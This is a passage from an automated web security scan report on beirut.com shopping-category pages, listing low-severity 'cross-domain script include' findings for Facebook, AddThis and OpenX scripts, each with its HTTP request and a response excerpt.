<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.667. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:19:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.668. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:11:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.669. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:22:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.670. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:53:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.671. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:47:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.672. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Equipment-Gadgets/339412286 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:19:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.673. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:12:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.674. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:00:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.675. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:59:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.676. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Equipment-Gadgets/339412286/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:08:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.677. http://www.beirut.com/Shopping/Home-Furnishings/4120758082 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.678. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:20:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
